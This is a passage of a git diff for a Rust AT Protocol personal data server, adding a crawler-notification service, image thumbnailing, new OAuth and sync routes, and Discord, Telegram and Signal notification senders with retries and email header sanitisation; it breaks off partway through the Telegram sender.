let result: Result<i32, CircuitBreakerError<std::io::Error>> =
|
||||
with_circuit_breaker(&cb, || async { Ok(42) }).await;
|
||||
assert!(result.is_ok());
|
||||
assert_eq!(result.unwrap(), 42);
|
||||
|
||||
let result: Result<i32, CircuitBreakerError<&str>> =
|
||||
with_circuit_breaker(&cb, || async { Err("error") }).await;
|
||||
assert!(result.is_err());
|
||||
}
|
||||
}
|
||||
170
src/crawlers.rs
Normal file
170
src/crawlers.rs
Normal file
@@ -0,0 +1,170 @@
|
||||
use crate::circuit_breaker::CircuitBreaker;
|
||||
use crate::sync::firehose::SequencedEvent;
|
||||
use reqwest::Client;
|
||||
use std::sync::atomic::{AtomicU64, Ordering};
|
||||
use std::sync::Arc;
|
||||
use std::time::Duration;
|
||||
use tokio::sync::{broadcast, watch};
|
||||
use tracing::{debug, error, info, warn};
|
||||
|
||||
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
|
||||
|
||||
pub struct Crawlers {
|
||||
hostname: String,
|
||||
crawler_urls: Vec<String>,
|
||||
http_client: Client,
|
||||
last_notified: AtomicU64,
|
||||
circuit_breaker: Option<Arc<CircuitBreaker>>,
|
||||
}
|
||||
|
||||
impl Crawlers {
|
||||
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
|
||||
Self {
|
||||
hostname,
|
||||
crawler_urls,
|
||||
http_client: Client::builder()
|
||||
.timeout(Duration::from_secs(30))
|
||||
.build()
|
||||
.unwrap_or_default(),
|
||||
last_notified: AtomicU64::new(0),
|
||||
circuit_breaker: None,
|
||||
}
|
||||
}
|
||||
|
||||
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
|
||||
self.circuit_breaker = Some(circuit_breaker);
|
||||
self
|
||||
}
|
||||
|
||||
pub fn from_env() -> Option<Self> {
|
||||
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
|
||||
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
|
||||
.unwrap_or_default()
|
||||
.split(',')
|
||||
.filter(|s| !s.is_empty())
|
||||
.map(|s| s.trim().to_string())
|
||||
.collect();
|
||||
|
||||
if crawler_urls.is_empty() {
|
||||
return None;
|
||||
}
|
||||
|
||||
Some(Self::new(hostname, crawler_urls))
|
||||
}
|
||||
|
||||
fn should_notify(&self) -> bool {
|
||||
let now = std::time::SystemTime::now()
|
||||
.duration_since(std::time::UNIX_EPOCH)
|
||||
.unwrap_or_default()
|
||||
.as_secs();
|
||||
let last = self.last_notified.load(Ordering::Relaxed);
|
||||
now - last >= NOTIFY_THRESHOLD_SECS
|
||||
}
|
||||
|
||||
fn mark_notified(&self) {
|
||||
let now = std::time::SystemTime::now()
|
||||
.duration_since(std::time::UNIX_EPOCH)
|
||||
.unwrap_or_default()
|
||||
.as_secs();
|
||||
self.last_notified.store(now, Ordering::Relaxed);
|
||||
}
|
||||
|
||||
pub async fn notify_of_update(&self) {
|
||||
if !self.should_notify() {
|
||||
debug!("Skipping crawler notification due to debounce");
|
||||
return;
|
||||
}
|
||||
|
||||
if let Some(cb) = &self.circuit_breaker {
|
||||
if !cb.can_execute().await {
|
||||
debug!("Skipping crawler notification due to circuit breaker open");
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
self.mark_notified();
|
||||
|
||||
let circuit_breaker = self.circuit_breaker.clone();
|
||||
|
||||
for crawler_url in &self.crawler_urls {
|
||||
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
|
||||
let hostname = self.hostname.clone();
|
||||
let client = self.http_client.clone();
|
||||
let cb = circuit_breaker.clone();
|
||||
|
||||
tokio::spawn(async move {
|
||||
match client
|
||||
.post(&url)
|
||||
.json(&serde_json::json!({ "hostname": hostname }))
|
||||
.send()
|
||||
.await
|
||||
{
|
||||
Ok(response) => {
|
||||
if response.status().is_success() {
|
||||
debug!(crawler = %url, "Successfully notified crawler");
|
||||
if let Some(cb) = cb {
|
||||
cb.record_success().await;
|
||||
}
|
||||
} else {
|
||||
warn!(
|
||||
crawler = %url,
|
||||
status = %response.status(),
|
||||
"Crawler notification returned non-success status"
|
||||
);
|
||||
if let Some(cb) = cb {
|
||||
cb.record_failure().await;
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
warn!(crawler = %url, error = %e, "Failed to notify crawler");
|
||||
if let Some(cb) = cb {
|
||||
cb.record_failure().await;
|
||||
}
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn start_crawlers_service(
|
||||
crawlers: Arc<Crawlers>,
|
||||
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
|
||||
mut shutdown: watch::Receiver<bool>,
|
||||
) {
|
||||
info!(
|
||||
hostname = %crawlers.hostname,
|
||||
crawler_count = crawlers.crawler_urls.len(),
|
||||
crawlers = ?crawlers.crawler_urls,
|
||||
"Starting crawlers notification service"
|
||||
);
|
||||
|
||||
loop {
|
||||
tokio::select! {
|
||||
result = firehose_rx.recv() => {
|
||||
match result {
|
||||
Ok(event) => {
|
||||
if event.event_type == "commit" {
|
||||
crawlers.notify_of_update().await;
|
||||
}
|
||||
}
|
||||
Err(broadcast::error::RecvError::Lagged(n)) => {
|
||||
warn!(skipped = n, "Crawlers service lagged behind firehose");
|
||||
crawlers.notify_of_update().await;
|
||||
}
|
||||
Err(broadcast::error::RecvError::Closed) => {
|
||||
error!("Firehose channel closed, stopping crawlers service");
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
_ = shutdown.changed() => {
|
||||
if *shutdown.borrow() {
|
||||
info!("Crawlers service shutting down");
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
304
src/image/mod.rs
Normal file
304
src/image/mod.rs
Normal file
@@ -0,0 +1,304 @@
|
||||
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
|
||||
use std::io::Cursor;
|
||||
|
||||
pub const THUMB_SIZE_FEED: u32 = 200;
|
||||
pub const THUMB_SIZE_FULL: u32 = 1000;
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ProcessedImage {
|
||||
pub data: Vec<u8>,
|
||||
pub mime_type: String,
|
||||
pub width: u32,
|
||||
pub height: u32,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ImageProcessingResult {
|
||||
pub original: ProcessedImage,
|
||||
pub thumbnail_feed: Option<ProcessedImage>,
|
||||
pub thumbnail_full: Option<ProcessedImage>,
|
||||
}
|
||||
|
||||
#[derive(Debug, thiserror::Error)]
|
||||
pub enum ImageError {
|
||||
#[error("Failed to decode image: {0}")]
|
||||
DecodeError(String),
|
||||
|
||||
#[error("Failed to encode image: {0}")]
|
||||
EncodeError(String),
|
||||
|
||||
#[error("Unsupported image format: {0}")]
|
||||
UnsupportedFormat(String),
|
||||
|
||||
#[error("Image too large: {width}x{height} exceeds maximum {max_dimension}")]
|
||||
TooLarge {
|
||||
width: u32,
|
||||
height: u32,
|
||||
max_dimension: u32,
|
||||
},
|
||||
|
||||
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
|
||||
FileTooLarge { size: usize, max_size: usize },
|
||||
}
|
||||
|
||||
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
|
||||
|
||||
pub struct ImageProcessor {
|
||||
max_dimension: u32,
|
||||
max_file_size: usize,
|
||||
output_format: OutputFormat,
|
||||
generate_thumbnails: bool,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Copy)]
|
||||
pub enum OutputFormat {
|
||||
WebP,
|
||||
Jpeg,
|
||||
Png,
|
||||
Original,
|
||||
}
|
||||
|
||||
impl Default for ImageProcessor {
|
||||
fn default() -> Self {
|
||||
Self {
|
||||
max_dimension: 4096,
|
||||
max_file_size: DEFAULT_MAX_FILE_SIZE,
|
||||
output_format: OutputFormat::WebP,
|
||||
generate_thumbnails: true,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
impl ImageProcessor {
|
||||
pub fn new() -> Self {
|
||||
Self::default()
|
||||
}
|
||||
|
||||
pub fn with_max_dimension(mut self, max: u32) -> Self {
|
||||
self.max_dimension = max;
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_max_file_size(mut self, max: usize) -> Self {
|
||||
self.max_file_size = max;
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
|
||||
self.output_format = format;
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_thumbnails(mut self, generate: bool) -> Self {
|
||||
self.generate_thumbnails = generate;
|
||||
self
|
||||
}
|
||||
|
||||
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
|
||||
if data.len() > self.max_file_size {
|
||||
return Err(ImageError::FileTooLarge {
|
||||
size: data.len(),
|
||||
max_size: self.max_file_size,
|
||||
});
|
||||
}
|
||||
|
||||
let format = self.detect_format(mime_type, data)?;
|
||||
let img = self.decode_image(data, format)?;
|
||||
|
||||
if img.width() > self.max_dimension || img.height() > self.max_dimension {
|
||||
return Err(ImageError::TooLarge {
|
||||
width: img.width(),
|
||||
height: img.height(),
|
||||
max_dimension: self.max_dimension,
|
||||
});
|
||||
}
|
||||
|
||||
let original = self.encode_image(&img)?;
|
||||
|
||||
let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) {
|
||||
Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?)
|
||||
} else {
|
||||
None
|
||||
};
|
||||
|
||||
let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) {
|
||||
Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?)
|
||||
} else {
|
||||
None
|
||||
};
|
||||
|
||||
Ok(ImageProcessingResult {
|
||||
original,
|
||||
thumbnail_feed,
|
||||
thumbnail_full,
|
||||
})
|
||||
}
|
||||
|
||||
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
|
||||
match mime_type.to_lowercase().as_str() {
|
||||
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
|
||||
"image/png" => Ok(ImageFormat::Png),
|
||||
"image/gif" => Ok(ImageFormat::Gif),
|
||||
"image/webp" => Ok(ImageFormat::WebP),
|
||||
_ => {
|
||||
if let Ok(format) = image::guess_format(data) {
|
||||
Ok(format)
|
||||
} else {
|
||||
Err(ImageError::UnsupportedFormat(mime_type.to_string()))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
|
||||
let cursor = Cursor::new(data);
|
||||
let reader = ImageReader::with_format(cursor, format);
|
||||
reader
|
||||
.decode()
|
||||
.map_err(|e| ImageError::DecodeError(e.to_string()))
|
||||
}
|
||||
|
||||
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
|
||||
let (data, mime_type) = match self.output_format {
|
||||
OutputFormat::WebP => {
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
|
||||
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
|
||||
(buf, "image/webp".to_string())
|
||||
}
|
||||
OutputFormat::Jpeg => {
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
|
||||
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
|
||||
(buf, "image/jpeg".to_string())
|
||||
}
|
||||
OutputFormat::Png => {
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
|
||||
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
|
||||
(buf, "image/png".to_string())
|
||||
}
|
||||
OutputFormat::Original => {
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
|
||||
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
|
||||
(buf, "image/png".to_string())
|
||||
}
|
||||
};
|
||||
|
||||
Ok(ProcessedImage {
|
||||
data,
|
||||
mime_type,
|
||||
width: img.width(),
|
||||
height: img.height(),
|
||||
})
|
||||
}
|
||||
|
||||
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
|
||||
let (orig_width, orig_height) = (img.width(), img.height());
|
||||
|
||||
let (new_width, new_height) = if orig_width > orig_height {
|
||||
let ratio = max_size as f64 / orig_width as f64;
|
||||
(max_size, (orig_height as f64 * ratio) as u32)
|
||||
} else {
|
||||
let ratio = max_size as f64 / orig_height as f64;
|
||||
((orig_width as f64 * ratio) as u32, max_size)
|
||||
};
|
||||
|
||||
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
|
||||
self.encode_image(&thumb)
|
||||
}
|
||||
|
||||
pub fn is_supported_mime_type(mime_type: &str) -> bool {
|
||||
matches!(
|
||||
mime_type.to_lowercase().as_str(),
|
||||
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
|
||||
)
|
||||
}
|
||||
|
||||
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
|
||||
let format = image::guess_format(data)
|
||||
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
|
||||
|
||||
let cursor = Cursor::new(data);
|
||||
let img = ImageReader::with_format(cursor, format)
|
||||
.decode()
|
||||
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
|
||||
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), format)
|
||||
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
|
||||
|
||||
Ok(buf)
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_small_image() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_image(100, 100);
|
||||
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert!(result.thumbnail_feed.is_none());
|
||||
assert!(result.thumbnail_full.is_none());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_large_image_generates_thumbnails() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_image(2000, 1500);
|
||||
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert!(result.thumbnail_feed.is_some());
|
||||
assert!(result.thumbnail_full.is_some());
|
||||
|
||||
let feed_thumb = result.thumbnail_feed.unwrap();
|
||||
assert!(feed_thumb.width <= THUMB_SIZE_FEED);
|
||||
assert!(feed_thumb.height <= THUMB_SIZE_FEED);
|
||||
|
||||
let full_thumb = result.thumbnail_full.unwrap();
|
||||
assert!(full_thumb.width <= THUMB_SIZE_FULL);
|
||||
assert!(full_thumb.height <= THUMB_SIZE_FULL);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_webp_conversion() {
|
||||
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
|
||||
let data = create_test_image(500, 500);
|
||||
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert_eq!(result.original.mime_type, "image/webp");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_reject_too_large() {
|
||||
let processor = ImageProcessor::new().with_max_dimension(1000);
|
||||
let data = create_test_image(2000, 2000);
|
||||
|
||||
let result = processor.process(&data, "image/png");
|
||||
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_is_supported_mime_type() {
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/png"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
|
||||
}
|
||||
}
|
||||
22
src/lib.rs
22
src/lib.rs
@@ -1,14 +1,19 @@
|
||||
pub mod api;
|
||||
pub mod auth;
|
||||
pub mod circuit_breaker;
|
||||
pub mod config;
|
||||
pub mod crawlers;
|
||||
pub mod image;
|
||||
pub mod notifications;
|
||||
pub mod oauth;
|
||||
pub mod plc;
|
||||
pub mod rate_limit;
|
||||
pub mod repo;
|
||||
pub mod state;
|
||||
pub mod storage;
|
||||
pub mod sync;
|
||||
pub mod util;
|
||||
pub mod validation;
|
||||
|
||||
use axum::{
|
||||
Router,
|
||||
@@ -20,6 +25,7 @@ pub fn app(state: AppState) -> Router {
|
||||
Router::new()
|
||||
.route("/health", get(api::server::health))
|
||||
.route("/xrpc/_health", get(api::server::health))
|
||||
.route("/robots.txt", get(api::server::robots_txt))
|
||||
.route(
|
||||
"/xrpc/com.atproto.server.describeServer",
|
||||
get(api::server::describe_server),
|
||||
@@ -140,6 +146,14 @@ pub fn app(state: AppState) -> Router {
|
||||
"/xrpc/com.atproto.sync.subscribeRepos",
|
||||
get(sync::subscribe_repos),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/com.atproto.sync.getHead",
|
||||
get(sync::get_head),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/com.atproto.sync.getCheckout",
|
||||
get(sync::get_checkout),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/com.atproto.moderation.createReport",
|
||||
post(api::moderation::create_report),
|
||||
@@ -338,9 +352,17 @@ pub fn app(state: AppState) -> Router {
|
||||
)
|
||||
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
|
||||
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
|
||||
.route("/oauth/authorize/select", post(oauth::endpoints::authorize_select))
|
||||
.route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get))
|
||||
.route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post))
|
||||
.route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny))
|
||||
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
|
||||
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
|
||||
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
|
||||
.route(
|
||||
"/xrpc/com.atproto.temp.checkSignupQueue",
|
||||
get(api::temp::check_signup_queue),
|
||||
)
|
||||
.route("/xrpc/{*method}", any(api::proxy::proxy_handler))
|
||||
.with_state(state)
|
||||
}
|
||||
|
||||
43
src/main.rs
43
src/main.rs
@@ -1,7 +1,9 @@
|
||||
use bspds::notifications::{EmailSender, NotificationService};
|
||||
use bspds::crawlers::{Crawlers, start_crawlers_service};
|
||||
use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender};
|
||||
use bspds::state::AppState;
|
||||
use std::net::SocketAddr;
|
||||
use std::process::ExitCode;
|
||||
use std::sync::Arc;
|
||||
use tokio::sync::watch;
|
||||
use tracing::{error, info, warn};
|
||||
|
||||
@@ -41,13 +43,6 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
|
||||
let state = AppState::new(pool.clone()).await;
|
||||
|
||||
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
|
||||
let relays = std::env::var("RELAYS")
|
||||
.unwrap_or_default()
|
||||
.split(',')
|
||||
.filter(|s| !s.is_empty())
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
bspds::sync::relay_client::start_relay_clients(state.clone(), relays, None).await;
|
||||
|
||||
let (shutdown_tx, shutdown_rx) = watch::channel(false);
|
||||
|
||||
@@ -60,7 +55,34 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
|
||||
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
|
||||
}
|
||||
|
||||
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx));
|
||||
if let Some(discord_sender) = DiscordSender::from_env() {
|
||||
info!("Discord notifications enabled");
|
||||
notification_service = notification_service.register_sender(discord_sender);
|
||||
}
|
||||
|
||||
if let Some(telegram_sender) = TelegramSender::from_env() {
|
||||
info!("Telegram notifications enabled");
|
||||
notification_service = notification_service.register_sender(telegram_sender);
|
||||
}
|
||||
|
||||
if let Some(signal_sender) = SignalSender::from_env() {
|
||||
info!("Signal notifications enabled");
|
||||
notification_service = notification_service.register_sender(signal_sender);
|
||||
}
|
||||
|
||||
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
|
||||
|
||||
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
|
||||
let crawlers = Arc::new(
|
||||
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
|
||||
);
|
||||
let firehose_rx = state.firehose_tx.subscribe();
|
||||
info!("Crawlers notification service enabled");
|
||||
Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx)))
|
||||
} else {
|
||||
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
|
||||
None
|
||||
};
|
||||
|
||||
let app = bspds::app(state);
|
||||
|
||||
@@ -75,6 +97,9 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
|
||||
.await;
|
||||
|
||||
notification_handle.await.ok();
|
||||
if let Some(handle) = crawlers_handle {
|
||||
handle.await.ok();
|
||||
}
|
||||
|
||||
if let Err(e) = server_result {
|
||||
return Err(format!("Server error: {}", e).into());
|
||||
|
||||
@@ -2,11 +2,14 @@ mod sender;
|
||||
mod service;
|
||||
mod types;
|
||||
|
||||
pub use sender::{EmailSender, NotificationSender};
|
||||
pub use sender::{
|
||||
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
|
||||
is_valid_phone_number, sanitize_header_value,
|
||||
};
|
||||
pub use service::{
|
||||
enqueue_account_deletion, enqueue_email_update, enqueue_email_verification,
|
||||
enqueue_notification, enqueue_password_reset, enqueue_plc_operation, enqueue_welcome,
|
||||
NotificationService,
|
||||
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
|
||||
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
|
||||
enqueue_plc_operation, enqueue_welcome, NotificationService,
|
||||
};
|
||||
pub use types::{
|
||||
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
|
||||
|
||||
@@ -1,10 +1,17 @@
|
||||
use async_trait::async_trait;
|
||||
use reqwest::Client;
|
||||
use serde_json::json;
|
||||
use std::process::Stdio;
|
||||
use std::time::Duration;
|
||||
use tokio::io::AsyncWriteExt;
|
||||
use tokio::process::Command;
|
||||
|
||||
use super::types::{NotificationChannel, QueuedNotification};
|
||||
|
||||
const HTTP_TIMEOUT_SECS: u64 = 30;
|
||||
const MAX_RETRIES: u32 = 3;
|
||||
const INITIAL_RETRY_DELAY_MS: u64 = 500;
|
||||
|
||||
#[async_trait]
|
||||
pub trait NotificationSender: Send + Sync {
|
||||
fn channel(&self) -> NotificationChannel;
|
||||
@@ -24,6 +31,48 @@ pub enum SendError {
|
||||
|
||||
#[error("External service error: {0}")]
|
||||
ExternalService(String),
|
||||
|
||||
#[error("Invalid recipient format: {0}")]
|
||||
InvalidRecipient(String),
|
||||
|
||||
#[error("Request timeout")]
|
||||
Timeout,
|
||||
|
||||
#[error("Max retries exceeded: {0}")]
|
||||
MaxRetriesExceeded(String),
|
||||
}
|
||||
|
||||
fn create_http_client() -> Client {
|
||||
Client::builder()
|
||||
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
|
||||
.connect_timeout(Duration::from_secs(10))
|
||||
.build()
|
||||
.unwrap_or_else(|_| Client::new())
|
||||
}
|
||||
|
||||
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
|
||||
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
|
||||
}
|
||||
|
||||
async fn retry_delay(attempt: u32) {
|
||||
let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
|
||||
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
|
||||
}
|
||||
|
||||
pub fn sanitize_header_value(value: &str) -> String {
|
||||
value.replace(['\r', '\n'], " ").trim().to_string()
|
||||
}
|
||||
|
||||
pub fn is_valid_phone_number(number: &str) -> bool {
|
||||
if number.len() < 2 || number.len() > 20 {
|
||||
return false;
|
||||
}
|
||||
let mut chars = number.chars();
|
||||
if chars.next() != Some('+') {
|
||||
return false;
|
||||
}
|
||||
let remaining: String = chars.collect();
|
||||
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
|
||||
}
|
||||
|
||||
pub struct EmailSender {
|
||||
@@ -47,18 +96,19 @@ impl EmailSender {
|
||||
Some(Self::new(from_address, from_name))
|
||||
}
|
||||
|
||||
fn format_email(&self, notification: &QueuedNotification) -> String {
|
||||
let subject = notification.subject.as_deref().unwrap_or("Notification");
|
||||
pub fn format_email(&self, notification: &QueuedNotification) -> String {
|
||||
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
|
||||
let recipient = sanitize_header_value(¬ification.recipient);
|
||||
let from_header = if self.from_name.is_empty() {
|
||||
self.from_address.clone()
|
||||
} else {
|
||||
format!("{} <{}>", self.from_name, self.from_address)
|
||||
format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address)
|
||||
};
|
||||
|
||||
format!(
|
||||
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
|
||||
from_header,
|
||||
notification.recipient,
|
||||
recipient,
|
||||
subject,
|
||||
notification.body
|
||||
)
|
||||
@@ -96,3 +146,242 @@ impl NotificationSender for EmailSender {
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
pub struct DiscordSender {
|
||||
webhook_url: String,
|
||||
http_client: Client,
|
||||
}
|
||||
|
||||
impl DiscordSender {
|
||||
pub fn new(webhook_url: String) -> Self {
|
||||
Self {
|
||||
webhook_url,
|
||||
http_client: create_http_client(),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn from_env() -> Option<Self> {
|
||||
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
|
||||
Some(Self::new(webhook_url))
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl NotificationSender for DiscordSender {
|
||||
fn channel(&self) -> NotificationChannel {
|
||||
NotificationChannel::Discord
|
||||
}
|
||||
|
||||
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
|
||||
let subject = notification.subject.as_deref().unwrap_or("Notification");
|
||||
let content = format!("**{}**\n\n{}", subject, notification.body);
|
||||
|
||||
let payload = json!({
|
||||
"content": content,
|
||||
"username": "BSPDS"
|
||||
});
|
||||
|
||||
let mut last_error = None;
|
||||
for attempt in 0..MAX_RETRIES {
|
||||
let result = self
|
||||
.http_client
|
||||
.post(&self.webhook_url)
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(response) => {
|
||||
if response.status().is_success() {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let status = response.status();
|
||||
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
|
||||
last_error = Some(format!("Discord webhook returned {}", status));
|
||||
retry_delay(attempt).await;
|
||||
continue;
|
||||
}
|
||||
|
||||
let body = response.text().await.unwrap_or_default();
|
||||
return Err(SendError::ExternalService(format!(
|
||||
"Discord webhook returned {}: {}",
|
||||
status, body
|
||||
)));
|
||||
}
|
||||
Err(e) => {
|
||||
if e.is_timeout() {
|
||||
if attempt < MAX_RETRIES - 1 {
|
||||
last_error = Some(format!("Discord request timed out"));
|
||||
retry_delay(attempt).await;
|
||||
continue;
|
||||
}
|
||||
return Err(SendError::Timeout);
|
||||
}
|
||||
return Err(SendError::ExternalService(format!(
|
||||
"Discord request failed: {}",
|
||||
e
|
||||
)));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Err(SendError::MaxRetriesExceeded(
|
||||
last_error.unwrap_or_else(|| "Unknown error".to_string()),
|
||||
))
|
||||
}
|
||||
}
|
||||
|
||||
pub struct TelegramSender {
|
||||
bot_token: String,
|
||||
http_client: Client,
|
||||
}
|
||||
|
||||
impl TelegramSender {
|
||||
pub fn new(bot_token: String) -> Self {
|
||||
Self {
|
||||
bot_token,
|
||||
http_client: create_http_client(),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn from_env() -> Option<Self> {
|
||||
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
|
||||
Some(Self::new(bot_token))
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl NotificationSender for TelegramSender {
|
||||
fn channel(&self) -> NotificationChannel {
|
||||
NotificationChannel::Telegram
|
||||
}
|
||||
|
||||
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
|
||||
let chat_id = ¬ification.recipient;
|
||||
let subject = notification.subject.as_deref().unwrap_or("Notification");
|
||||
let text = format!("*{}*\n\n{}", subject, notification.body);
|
||||
|
||||
let url = format!(
|
||||
"https://api.telegram.org/bot{}/sendMessage",
|
||||
self.bot_token
|
||||
);
|
||||
|
||||
let payload = json!({
|
||||
"chat_id": chat_id,
|
||||
"text": text,
|
||||
"parse_mode": "Markdown"
|
||||
});
|
||||
|
||||
let mut last_error = None;
|
||||
for attempt in 0..MAX_RETRIES {
|
||||
